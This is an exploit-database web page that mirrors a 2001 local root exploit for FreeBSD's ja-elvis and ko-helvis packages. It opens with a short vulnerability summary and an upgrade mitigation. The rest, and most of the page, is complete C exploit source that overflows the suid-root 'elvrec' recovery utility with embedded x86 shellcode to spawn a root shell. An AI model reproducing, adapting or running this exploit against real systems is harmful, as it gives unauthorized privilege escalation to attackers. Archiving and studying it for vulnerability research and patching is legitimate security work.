Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
FreeBSD ja-elvis & ko-helvis Local Root Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
ja-elvis and ko-helvis
by:
dethy
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: ja-elvis and ko-helvis
Affected Version From: Versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
Affected Version To: Not provided
Patch Exists: YES
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD 3.5.1 and 4.2
2001

FreeBSD ja-elvis & ko-helvis Local Root Exploit

The ja-elvis and ko-helvis packages on FreeBSD versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1 contain a file recovery utility called 'elvrec' that is installed suid root(4755) by default. This utility is vulnerable to a buffer overflow, which can be exploited to gain root privileges.

Mitigation:

Upgrade to ja-elvis-1.8.4_1 or ko-helvis-1.8h2_1 or later versions.
Source

Exploit-DB raw data:

/*
 * ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 *
 * vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
 * 
 * The above two packages contain a file recovery utility 'elvrec', installed
 * suid root(4755) by default. The utility is subject to a buffer overflow 
 * leading to root privileges:
 *
 * Usage: ./elvwreck <offset> <alignment>
 * 
 * dethy@synnergy.net // www.synnergy.net
 * 28 Feb 2001.
 *
 */ 

#include <stdio.h>
#include <stdlib.h>
#define PROG	"/usr/local/bin/elvrec"
#define VULN	608
#define BSIZE	1024
#define NOP	0x90
#define ESP	0xbfbff92c	// FreeBSD 4.2
#define OFFSET	0
#define EATME	1		// byte alignment

char shellcode[]= 
  "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
  "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
  "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
  "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
  "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
  "\x02\x02\x02/bin/sh.-c.sh";

int main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address=ESP;
  int i, offset, align;

  if(argc > 1) { offset = atoi(argv[1]); align = atoi(argv[2]); } 
  else { offset = OFFSET; align = EATME; }

  address += offset;
  fprintf(stderr, "\n* using ret %#x -> align %d -> offset %d\n\n", address, align, offset); 

  for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
  for(i=VULN; i<(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
  memcpy(buffer+i, shellcode, strlen(shellcode));
  buffer[BSIZE] = '\0';

  if(execlp(PROG, "elvrec", buffer, 0)) {
    fprintf(stderr, "Unable to execute %s\n\n", PROG);
    exit(1);
  }
}


// milw0rm.com [2001-03-03]

Navigation

Suggest Exploit

Services By CQR